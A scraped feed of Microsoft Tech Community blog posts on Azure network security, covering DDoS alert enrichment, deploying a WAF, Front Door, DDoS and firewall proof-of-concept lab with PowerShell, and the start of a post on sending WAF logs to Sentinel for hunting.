image-alt="Anthony_Roman_2-1606241256583.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/235789iFA2CABDA96EB1BFC/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_2-1606241256583.png" alt="Anthony_Roman_2-1606241256583.png" /></span></P> <P>&nbsp;</P> <P>In addition to the resource type and name, an important piece of metadata returned by the query is tag information. Specifically, the owner tag is parsed to determine who to notify in the event of an attack against the IP address. If it is not standard policy to populate this tag in your environment, there are Azure Policies available to do this automatically. Alternatively, the Logic App can be edited to use some other tag to determine the recipient of the alert.</P> <P>&nbsp;</P> <P>DDoS attacks commonly target web applications as the most visible and valuable assets, but other publicly facing resources can and do get attacked. The Logic App will initiate a test, a simple HTTP GET on port 80, against the IP address being attacked. This is of course making an assumption that there is a web application running behind the IP address and listening on port 80. This assumption is meant to provide extra information about the status of the asset under attack, which will be surfaced in the alert.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_3-1606241256586.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/235787i59A317BB7B0DAA47/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_3-1606241256586.png" alt="Anthony_Roman_3-1606241256586.png" /></span></P> <P>&nbsp;</P> <P>Based on both the query results and the results of the HTTP request, an email alert is finally sent to both the security team, as identified in the ARM template parameters, and the owner of the attacked resource.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_4-1606241256609.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/235790iF8D18432062D249F/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_4-1606241256609.png" alt="Anthony_Roman_4-1606241256609.png" /></span></P> <P>&nbsp;</P> <P>In the example email, actionable information is provided about the resource being attacked, including the status of the HTTP test. In this case, the resource associated to the Public IP Address is an Application Gateway, and the availability test returned a 502 Bad Gateway, which can indicate that the backend resources are unavailable. If this is the case, both the resource owner and the security team can work together to respond with the help of Microsoft Support.</P> <P>&nbsp;</P> <P>When deployed in your environment, the ARM template for enriched alerting will provide an excellent starting point for you to customize to the needs of your environment and response procedures.</P> Tue, 09 Feb 2021 17:54:52 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enriching-ddos-protection-alerts-with-logic-apps/ba-p/1928000 Anthony_Roman 2021-02-09T17:54:52Z Azure Network Security Proof of Concept Part 2: Deploying the environment https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-2-deploying-the/ba-p/1773168 <P>&nbsp;</P> <P>In the <EM>Planning to perform Proof of Concept guide&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-1-planning/ba-p/1746368" target="_self">Part 1</A>&nbsp;, </EM>we discussed the necessary steps for a successful POC such as : Understanding network security requirements for the different resources, creating indices to measure successful security POC, the security standards to be reviewed, how to create timelines to work on security lapses and how to monitor the network for improvement<EM>.</EM></P> <P>&nbsp;</P> <P>In this second part, you will learn to deploy and verify the environment to validate some of the sample Proof of Concept mentioned earlier. If you know the elements required already, you can go straight to the components (WAF, Azure Firewall or DDOS) in the sections below.</P> <P>&nbsp;</P> <H3>Permissions</H3> <P>To provision and configure resources, it is necessary to have Network Contributor access or a more permissive/<EM>administrator </EM>role.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><SPAN>Azure Network Security Demo Environment</SPAN></H2> <P>&nbsp;</P> <P>An Azure pre-configured test deployment kit for POC is available in <A href="#" target="_blank" rel="noopener">this repository</A>. By agreeing to the terms, you can use this environment for most of the POC in this guide e.g. DDOS protection, OWASP top ten core rule set, Virtual network security etc. This environment has been configured to have most of the tools you would need and they have been connected by network rules that you can verify.</P> <P>&nbsp;</P> <P>(<STRONG>Note</STRONG>: <EM>Resources in this deployment will incur some charges. Make sure to remove resources once POC is completed</EM>)</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT color="#333399"><STRONG>Deployment</STRONG></FONT></H2> <P>&nbsp;</P> <P>For <STRONG>portal</STRONG> deployment, Click on the Deploy button below to go to the deployment page.</P> <P class="lia-indent-padding-left-330px"><A href="#" target="_blank" rel="noopener"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="deply-to-azure.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226730i904DED280C74BD1B/image-size/small?v=v2&amp;px=200" role="button" title="deply-to-azure.png" alt="deply-to-azure.png" /></span></A></P> <UL> <LI>Create or use an existing <EM>resource group</EM>/region for the deployment.</LI> <LI>Provide <STRONG><EM>username</EM></STRONG>/<STRONG><EM>password </EM></STRONG>for access to the VMs.</LI> <LI>If you have <STRONG><EM>a Workspace Name</EM></STRONG> and <STRONG><EM>Workspace Subscription</EM></STRONG> for diagnostics log, insert it here. This is required for log access. If you do not have one, you can set it up <A href="#" target="_blank" rel="noopener">here</A>. This is highly recommended for all Azure resources.</LI> <LI>Click<STRONG> Create </STRONG>or <STRONG>Purchase </STRONG>to begin deployment.</LI> </UL> <P>&nbsp;</P> <P>To deploy the demo environment using <STRONG>PowerShell</STRONG>, follow these steps :</P> <P>&nbsp;</P> <P>Connect to your Azure environment</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="applescript">PS C:\windows\system32&gt; Connect-AzAccount</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>&nbsp;</STRONG>Create a <STRONG>resource group</STRONG> in your region</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="applescript">PS C:\windows\system32&gt; New-AzResourceGroup -Name demoresourcegroup -location "westus"</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Deploy the demo environment using the template in the <A href="#" target="_blank" rel="noopener">GitHub repository</A></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="applescript">PS C:\windows\system32&gt; New-AzResourceGroupDeployment -ResourceGroupName "demoresourcegroup" -TemplateUri https://raw.githubusercontent.com/Azure/Azure-Network-Security/master/Cross%20Product/Network%20Security%20Lab%20Template/AzNetSecdeploy.json -DiagnosticsWorkspaceName "TestWorkspace" -DiagnosticsWorkspaceSubscription "123456789-xxxx-xxxx-xxxx-b826eef6c592" -DiagnosticsWorkspaceResourceGroup "TestResourceGroup" -DDOSProtectionConfiguration $true</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>The following values in the last step should be updated for your account: <EM>Subscription ID</EM>, <EM>Log Analytics Workspace name</EM> and <EM>Resource Group</EM> for Log Analytics workspace.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-120px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="deploymentps.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226206i04EFE3B6361A1867/image-size/large?v=v2&amp;px=999" role="button" title="deploymentps.png" alt="deploymentps.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P>&nbsp;</P> <P>In view of the deployment type you use, the demo environment should include the following resources upon deployment:</P> <P>&nbsp;</P> <UL class="lia-list-style-type-circle"> <LI>3 Virtual Networks (1 Hub that hosts the firewall and 2 Spoke VNets)</LI> <LI>1 Application Gateway provisioned with Web Application Firewall</LI> <LI>1 Azure Front door with WAF enabled</LI> <LI>1 Azure Firewall (deployed in Hub VNet via Azure Firewall manager)</LI> <LI>3 VMs (2 Windows and 1 Kali Linux)</LI> <LI>2 Public IP addresses (1 for the Firewall and 1 for the App Gateway)</LI> <LI>DDoS protection enabled for the Hub virtual network</LI> <LI>2 NSGs</LI> <LI>Route table</LI> <LI>Web App (Demo web app to perform vulnerability tests)</LI> </UL> <P>&nbsp;</P> <P>The resources have been connected in a simple hub and spoke topology as seen in the diagram below.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="demo_env.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226215i5DFED87487D7094D/image-size/large?v=v2&amp;px=999" role="button" title="demo_env.png" alt="demo_env.png" /></span></P> <P>&nbsp;</P> <P>The <EM>hub</EM> is a virtual network (VN-HUB) in Azure that acts as a central point of connectivity to your on-premises network. This is where you want to place the firewall. The <EM>spokes</EM> are virtual networks that peer with the hub and can be used to isolate workloads, thereby modeling a common deployment scenario for most network designs. This network diagram uses these two basic connections to keep it simple:&nbsp;</P> <P>&nbsp;</P> <UL> <LI>The hub virtual network will use virtual gateway access for the firewall to route traffic.</LI> <LI>The Spoke virtual networks will use the subnets to host the Azure resources (VMs etc.)</LI> </UL> <P>&nbsp;</P> <P><EM>Other additional considerations</EM></P> <UL> <LI><EM>(If the planned spoke is in a local area network that requires a VPN connection through an external public interface, use this link: <A href="#" target="_blank" rel="noopener">On-Premise-Network connection to Gateway</A>).</EM></LI> <LI><EM>If you require multiple spoke-to-spoke connections, you may soon run out of virtual network peering allowable, User Defined Routings may be used to create routes in the router to forward traffic. See more on <A href="#" target="_blank" rel="noopener">Multiple-Spokes-VNET-Connections.</A></EM></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Azure Network Security Components</H2> <P>&nbsp;</P> <H2><STRONG><FONT color="#333399">Web Application Firewall (WAF)</FONT></STRONG></H2> <P>Web Application Firewall protects web apps from vulnerabilities and attacks without modification to back-end code, preventing the application from outage, data loss and attacks.</P> <P>&nbsp;</P> <H3><STRONG><FONT color="#333399">WAF policy</FONT></STRONG></H3> <P>WAF is configured through HTTP and HTTP/s listeners by setting up a WAF security policy and applying it to Azure Front Door, Application Gateway or CDN. <BR /><BR /></P> <P>&nbsp;</P> <H3><FONT color="#333399"><STRONG>WAF: Azure Application Gateway</STRONG></FONT></H3> <P>WAF when combined with Application Gateway work as a web traffic load balancer and provide L3-L7 security for your back-end pool: VMs, VM scale sets, IP addresses and app service. For more information on the App gateway go to <A href="#" target="_blank" rel="noopener">AppGateway features</A>.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-240px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobio_0-1602573298320.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226211i948554E10608098D/image-size/large?v=v2&amp;px=999" role="button" title="tobio_0-1602573298320.png" alt="tobio_0-1602573298320.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>To view the WAF policy configured with the <STRONG>Application Gateway</STRONG> in the <EM>demo</EM> deployment:</P> <P>&nbsp;</P> <UL class="lia-list-style-type-circle"> <LI class="lia-indent-padding-left-30px">Go to the test Resource group that was created “<STRONG>demoresourcegroup” </STRONG>and click on<STRONG> SOC-NS-AGPolicy </STRONG>to view the WAF policy for the Application Gateway. The managed and custom rule sets can be used to effectively <A href="#" target="_blank" rel="noopener">allow/deny traffic</A> when in <STRONG>prevention</STRONG> mode.</LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobio_0-1602575647184.png" style="width: 603px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226219iC7F82E366D78B2CA/image-dimensions/603x367?v=v2" width="603" height="367" role="button" title="tobio_0-1602575647184.png" alt="tobio_0-1602575647184.png" /></span></P> <P class="lia-indent-padding-left-90px">&nbsp;</P> <P><STRONG>Detection</STRONG> mode allows traffic to pass through while logging the attack events. Use this mode to observe and learn traffic behavior at the beginning for proper tuning, then switch to Prevention mode. This is the recommended configuration.</P> <P>&nbsp;</P> <P><EM>The <STRONG>request body size</STRONG> (KB) can also be edited here, and you can configure what parts of requests to exclude under the <STRONG>Exclusions </STRONG>area.</EM></P> <P><STRONG>&nbsp;</STRONG></P> <P><STRONG>Managed rule set:</STRONG> This is the OWASP top vulnerability attacks list. It uses the OWASP 3.1 or most recent core rule set.</P> <P>&nbsp;</P> <P><STRONG>Custom rule: </STRONG>To block an IP from Canada or geolocation of choice:&nbsp; Click <EM>+Add custom rule.</EM></P> <P>&nbsp;</P> <UL> <LI>Custom rule name: type “blockCanada”.</LI> <LI>Status: <STRONG>Enabled</STRONG>, Rule type: <STRONG>Match</STRONG>, Priority: <STRONG>1</STRONG> or as desire</LI> <LI>IF <STRONG>Matchtype</STRONG>: dropdown- Geolocation</LI> <LI>Select Canada. You can select more than one.</LI> <LI>Then: <EM>Select Deny traffic</EM> (Or redirect to a custom page).</LI> <LI>Click Add</LI> </UL> <P>&nbsp;</P> <P>To view the Custom rules set up earlier in the WAF policy, click on Custom rules. 3 custom rules can be seen. <A href="#" target="_blank" rel="noopener">Other features</A> of Application Gateway when combined with WAF include protection from crawlers and scanners, bot mitigation, cross-site scripting etc.</P> <DIV id="tinyMceEditortobio_2" class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV> <P>&nbsp;</P> <P>The OWASP <A href="#" target="_blank" rel="noopener">Juice shop website</A>, a site with vulnerabilities common to web apps, has been deployed in the App Gateway with WAF enabled for this scenario.</P> <P>&nbsp;</P> <UL> <LI>Go to the <STRONG><EM>demoresourcegroup</EM> </STRONG>and click on the Application Gateway configured with the demo deployment on the list: In our case: <STRONG><EM>SOC-NS-AG-WAFv2</EM>.</STRONG></LI> <LI>In the Overview section, on the right, the front-end private and public IP addresses associated with the Application Gateway are shown.</LI> <LI>Click on the <STRONG>Public IP</STRONG> to confirm the OWASP Juice web application is accessible.</LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-150px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="AppGW.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226223i491D5B9E0DD450CC/image-size/large?v=v2&amp;px=999" role="button" title="AppGW.png" alt="AppGW.png" /></span></P> <DIV id="tinyMceEditortobio_2" class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV> <P>&nbsp;</P> <P>&nbsp;</P> <P><FONT color="#333399"><STRONG>WAF: Azure Front Door</STRONG></FONT></P> <P>Azure Front Door provides a secure global traffic delivery solution for your backend resources. It uses <EM>anycast</EM> protocol to improve global connectivity and availability using smart health probe, URL Path Based Routing, Multiple site hosting, Session Affinity, App Layer security, URL redirection.</P> <P>&nbsp;</P> <P>The <STRONG>URL/IP </STRONG>for your web application and a <STRONG>Web Application Firewall </STRONG>policy are required to configure WAF for your environment behind Azure Front door.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px">To view the <STRONG>Front door </STRONG>and <STRONG>WAF </STRONG>configured with this deployment, go to the test resource group <EM>demoresourcegroup<STRONG>,</STRONG></EM> and click the <EM>Front door</EM> in the list. In this case, <STRONG><EM>Demowasp-jfyg5g7ve5w6a</EM></STRONG></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px">On the <STRONG>Overview</STRONG> page, click on the Frontend host link on the right to view the web app. It should be a link with <EM>azurefd.net</EM> as part of the URL. E.g. <STRONG><EM><A href="#" target="_blank" rel="noopener">https://Demowasp-7tzl765vvi3qe.azurefd.net</A></EM></STRONG></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">Back on the same Front door page, click on <STRONG><EM>Front Door designer</EM></STRONG></P> <P class="lia-indent-padding-left-60px">a. The <STRONG><EM>front-end</EM></STRONG> domain configured can be seen. Click on the demo app.</P> <P class="lia-indent-padding-left-90px">- The session affinity and WAF features can be toggled as desired.</P> <P class="lia-indent-padding-left-90px">- The policy applied can also be changed if you have created other policies.</P> <P class="lia-indent-padding-left-120px">&nbsp;</P> <P class="lia-indent-padding-left-60px">b. Under the <STRONG><EM>Backend pools</EM></STRONG>, the OWASP app can be viewed.</P> <P class="lia-indent-padding-left-90px">This is your app or container. Click the <EM>app</EM> to edit configurations such as health probes and load balancing options. Multiple backend hosts can also be added. In this case, we have added a back-end pool using the public IP address for our OWASP Juice shop application.</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">c. Lastly, <STRONG><EM>Routing rules</EM></STRONG>: This is connection between the frontend/domains and the backend pool from a and b above.</P> <P class="lia-indent-padding-left-90px">If an additional back-end pool is needed, you can add them here. Also,&nbsp;<A href="#" target="_blank" rel="noopener">Path Based routes</A> can also be set up in this window for content distribution and management. If you need to permit Front door access to your Keyvault, <A href="#" target="_blank" rel="noopener">check certificate permission</A></P> <P class="lia-indent-padding-left-90px">&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-180px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobio_0-1602610549062.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226377i2FD4723C9FAD65E8/image-size/large?v=v2&amp;px=999" role="button" title="tobio_0-1602610549062.png" alt="tobio_0-1602610549062.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Under <STRONG>Settings, </STRONG>select <EM>Web Application Firewall</EM>. The WAF policy for this front door <EM>SOCNSFDPolicy</EM> has been linked.</P> <P>When Front door is combined with WAF in this way, rate limiting can be configured to manage access to your backend resources.</P> <P>&nbsp;</P> <P>Visit the Azure <A href="#" target="_blank" rel="noopener">documentation</A> to see examples of custom rules with PowerShell and to configure the rules with Azure <A href="#" target="_blank" rel="noopener">portal</A>.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT color="#333399"><STRONG>DDoS</STRONG></FONT></H2> <P>To view the DDOS protection standard deployed, go to <STRONG>demoresourcegroup </STRONG>and click on <STRONG>SOCNSDDOSPLAN </STRONG>(or the name given to your DDOS plan in your resource group). You can enable and disable the plan here. DDOS can only be enabled for a Virtual Network. You can configure one DDoS protection plan for your organization and link virtual networks from multiple subscriptions to the same plan. More information on the DDOS plan <A href="#" target="_blank" rel="noopener">here.</A></P> <P>&nbsp;</P> <P>The test is performed using the public facing IP address to the resource’s endpoint. Apps may be placed in the Backend pool of App Gateway or set up in VMSS- all placed in the protected VNets, as shown in the network diagram above.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ddossubnets.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226381iCB07A2A044B98A88/image-size/large?v=v2&amp;px=999" role="button" title="ddossubnets.png" alt="ddossubnets.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <UL> <LI>Go to the <STRONG><EM>demoresourcegroup</EM> </STRONG>and click the<STRONG> <EM>VN-HUB</EM></STRONG>. The VN Hub is the virtual network protected by the DDOS protection standard.&nbsp;</LI> <LI>Under Settings, Click <STRONG>DDoS protection. </STRONG>If<STRONG> enabled, </STRONG>the two subnets in the Hub Virtual network: <STRONG>SOC-NS-AG-WAFv2</STRONG> and <STRONG>SOC-NS-FW</STRONG> are protected by the DDOS protection plan.</LI> </UL> <P>&nbsp;</P> <P>Go to the <EM>Application Gateway</EM>. To view the <STRONG>Front-end Public IP, </STRONG>Go to the right-hand corner of the Overview page.</P> <P>&nbsp;</P> <P>Next, we confirm how to set up<STRONG>&nbsp;the alerts</STRONG> for the DDOS protection metrics.</P> <P>&nbsp;</P> <UL> <LI>Go to the top search bar on the page and type in Monitor, Select <STRONG>Monitor</STRONG>.</LI> <LI>Under <STRONG>Alerts</STRONG>, select <STRONG>Manage alert rules, </STRONG>select <STRONG>+New Alert rule. </STRONG>Under<STRONG> Scope, </STRONG>choose your subscription and its resource group, select a Public IP. In this case: <STRONG><EM>SOCNSAGPIP (</EM></STRONG><EM>the Application gateway public facing IP address)</EM></LI> <LI>For <STRONG>Condition</STRONG>, Click <EM>Select Condition</EM> to add a new signal. Select “<STRONG>Under DDoS attack or Not</STRONG>”. <STRONG>Aggregation</STRONG>: Max, <STRONG>Threshold </STRONG>1.</LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="alertlogic.png" style="width: 737px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226383iF8145AD120B15D05/image-size/large?v=v2&amp;px=999" role="button" title="alertlogic.png" alt="alertlogic.png" /></span></P> <P class="lia-indent-padding-left-90px">&nbsp;</P> <UL> <LI><STRONG>Action </STRONG><A href="#" target="_blank" rel="noopener"><STRONG>Group</STRONG></A>: Enter a name and provide an email address or phone number for notification.</LI> <LI>Under <STRONG style="font-family: inherit;">Settings</STRONG><SPAN style="font-family: inherit;">, Go to Diagnostic settings, enable the public IP </SPAN><STRONG style="font-family: inherit;">SOCNSAGPIP</STRONG></LI> </UL> <P>&nbsp;</P> <P>Visit the web resources for additional information on DDOS <A href="#" target="_blank" rel="noopener">adaptive tuning</A> and <A href="#" target="_blank" rel="noopener">DDoS Protection telemetry, monitoring, and alerting</A> . We have now set up the test environment to observe DDOS protection metrics.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT color="#333399"><STRONG>Azure Firewall</STRONG></FONT></H2> <P>The “<EM>demoresourcegroup</EM><STRONG>” </STRONG>has a firewall policy managed via the Firewall manager in the secure hub VNet for the POC scenario.</P> <P>Azure Firewall Manager enables centralized management of your firewalls in your network. In this case, we have only one Firewall. <A href="#" target="_blank" rel="noopener">More on Azure Firewall Manager</A></P> <P>&nbsp;</P> <P>To access the firewall configuration in the test deployment:</P> <P>&nbsp;</P> <UL> <LI>Go to <STRONG><EM>demoresourcegroup</EM></STRONG>, Click on <EM>Firewall</EM> (In this example: <STRONG>SOC-NS-FW</STRONG>).</LI> <LI>Under Settings, Go to <EM>the Firewall Manager</EM><STRONG>. </STRONG>Click on <EM>the Azure Firewall Manager</EM>.&nbsp; Click “<STRONG>Azure Firewall Policies</STRONG>”.</LI> <LI>The firewall Policy properties can be seen. Click the policy (<EM>SOC-NS-Policy</EM>).</LI> <LI>Click on <STRONG>Rules </STRONG>under Settings to see the rules. There are 3 different rule types in the collection: <STRONG>Network</STRONG>, <STRONG>Application </STRONG>and <STRONG>DNAT </STRONG>rules. The VMs can be accessed through the NATted public IPs in the DNAT rules</LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="azfw.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226399i3D39FE683382F477/image-size/large?v=v2&amp;px=999" role="button" title="azfw.png" alt="azfw.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Azure Firewall design is explicit deny-by-default. You can configure the rules for your traffic. As seen in the image above, the Azure firewall in the demo has been configured with this the following:</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <UL> <LI><EM>The 2 spoke VNETs do not have direct connectivity between their subnets. </EM></LI> <LI><EM>Application rules are set up to grant and manage access using FQDN of search engines: Bing and Google for your test.</EM></LI> <LI><EM>Network rules to permit only </EM><EM>SMB, RDP and SSH and deny all others have been configured.</EM></LI> <LI><EM style="font-family: inherit;">DNAT rules to permit access from unique NATted IPs for VM access via the firewall have been configured</EM></LI> </UL> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P>You may insert additional rules for your POC and test for connectivity.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2><FONT color="#333399">Conclusion</FONT></H2> <P>&nbsp;</P> <P>Performing a Proof of concept may be done for several reasons: trying out a new network tool, introducing a new resource, capacity planning, performance, and response, trying out network architecture etc.</P> <P>&nbsp;</P> <P>When you have performed the Proof of concept, review the outcome with the reference model expectation in terms of established indices, success indices, security standards and timelines to work on newfound evidence.</P> <P>&nbsp;</P> <P>Also, confirm that you can monitor logs as discussed in the concluding session of part 1 of this series.</P> <P>&nbsp;</P> <P>Part 3 and beyond will focus on deep dive testing of these scenarios</P> <DIV id="tinyMceEditortobio_0" class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV> <P>&nbsp;</P> Fri, 16 Apr 2021 16:12:07 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-2-deploying-the/ba-p/1773168 tobiotolorin 2021-04-16T16:12:07Z Integrating Azure Web Application Firewall with Azure Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/integrating-azure-web-application-firewall-with-azure-sentinel/ba-p/1720306 <P>Written in collaboration with&nbsp;<LI-USER uid="89690"></LI-USER>&nbsp;and&nbsp;<LI-USER uid="293861"></LI-USER>&nbsp;</P> <P>&nbsp;</P> <H2>Introduction</H2> <P>&nbsp;</P> <P>Readers of this post will hopefully be familiar with both Azure Sentinel and Azure WAF. The idea we will be discussing is how to take the log data generated by WAF and do something useful with it in Sentinel, such as visualize patterns, detect potentially malicious activities, and respond to threats. If configured and tuned correctly (a topic for another post), Azure WAF will prevent attacks against your web applications. However, leaving WAF alone to do its job is not enough; security teams need to analyze the data to determine where improvements can be made and where extra action may be required on the part of response teams.</P> <P>&nbsp;</P> <H2>Send WAF Data to Sentinel</H2> <P>&nbsp;</P> <P>The first step to integrating these tools is to send WAF logs and other relevant data, such as access logs and metrics, to Sentinel. This process can be initiated using the built-in Sentinel Data Connector for Azure WAF:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_0-1601299630052.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/222567iBE25448A004664F7/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_0-1601299630052.png" alt="Anthony_Roman_0-1601299630052.png" /></span></P> <P>&nbsp;</P> <P>Once you have connected your WAF data sources to Azure Sentinel, you can visualize and monitor the data using Workbooks, which provide versatility in creating custom dashboards. Looking inside the Azure Sentinel Workbooks tab, look up the default Azure WAF Workbook template to get you started with all WAF data types.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture1.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/222575i266626DF2C259900/image-size/large?v=v2&amp;px=999" role="button" title="Picture1.gif" alt="Picture1.gif" /></span></P> <P>&nbsp;</P> <P>When starting out with the Microsoft WAF Workbook, you’ll be faced with a few data filter options:</P> <UL> <LI>Subscription ( Based on your portal <A href="#" target="_blank" rel="noopener">RBAC permissions</A> )</LI> <LI><A href="#" target="_blank" rel="noopener">Log Analytics workspaces</A></LI> <LI>Time Range</LI> <LI>WAF Data type (Example: <A href="#" target="_blank" rel="noopener">CDN</A>, <A href="#" target="_blank" rel="noopener">Application Gateway</A> or <A href="#" target="_blank" rel="noopener">Azure Front Door</A>)</LI> <LI>WAF Resources</LI> </UL> <P>In the short annotation below, you’ll be taken through a few preconfigured filters, two different subscriptions (across two different tenants), while having preselected two different workspaces. The annotation is going to walk through a SQL Injection attack that was detected and how you can filter down the information by time or by event data. Like an IPAddress or Tracking ID provided by the diagnostic logs.</P> <P>&nbsp;</P> <P>If you’re unfamiliar with a workbook, the design is a top to bottom filter experience. If you filter the top of the workbook, it’ll filter everything below with the selected filters above. You’ll see some filters that were not selected, example being “Blocked or Matched” within the logs, or the Blocked Request URI Addresses. Both could have been selected and filtered across the workbook.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="WAFWorkbook3.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/222599i820348A2D8A77305/image-size/large?v=v2&amp;px=999" role="button" title="WAFWorkbook3.gif" alt="WAFWorkbook3.gif" /></span></P> <P>&nbsp;</P> <H2>Hunting Using WAF Data</H2> <P>&nbsp;</P> <P>The core idea of Azure Sentinel is that relevant security regarding your hunting or investigation is produced in multiple locations/logs and being able to analyze them from a single point makes it easier to spot trends and see patterns that are out of the ordinary. The logs from our Azure WAF device is one critical part of this puzzle. As more and more companies move their applications to the cloud their Web Application security posture has become super relevant in their overall security framework. Through the WAF logs, we can analyze the application traffic and combine it with other data feeds to uncover various attack patterns that an organization needs to be aware of.</P> <P>&nbsp;</P> <P>However, to be able to effectively use the telemetry from WAF, a general understanding of the WAF logs is critical.&nbsp; It is very hard to focus on the hunting mission, be productive and effective if we don’t understand the data.&nbsp; WAF data is collected in Azure Sentinel under the <EM><STRONG>AzureDiagnostics </STRONG></EM>table. Depending on whether the Azure WAF policy is applied to web applications hosted on Application Gateway or Azure Front Doors the category under which the logs are collected are a little different.</P> <P>&nbsp;</P> <P>While we don’t cover this thoroughly in this post, WAF Policies can be applied to CDN; <A href="#" target="_blank" rel="noopener">more information here.</A> When applied to CDN, the relevant logs are under the category:</P> <UL> <LI>WebApplicationFirewallLogs (set on the WAF Policy)</LI> <LI>AzureCdnAccessLog (set on the CDN Profile)</LI> </UL> <P>There are subtle and nuanced differences between both these log types (Application Gateway vs Front Door) however in general, when we talk about the Access Logs, they give us an idea about Application’s access patterns. The firewall logs on the other hand logs any request that matches a WAF rule through either detection or prevention mode of the WAF policy. These logs include a bunch of interesting information like the caller's IP, port, requested URL, UserAgent and bytes in and out. The <A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub repository</A> is a great source of inspiration for the kind of hunting and detection queries that one can build with some of these fields. However, let us go through a couple of examples of what we can do with this data.</P> <P>&nbsp;</P> <P>One of the techniques that a lot of threat hunters have in their arsenal is count based hunting i.e. they aggregate the event data and look for events that crosses a particular threshold. For example, in the WAF data we could probably look for a number of sessions originating from a particular client IP address in a given interval of time. Once the number of connections exceeds a particular threshold value, 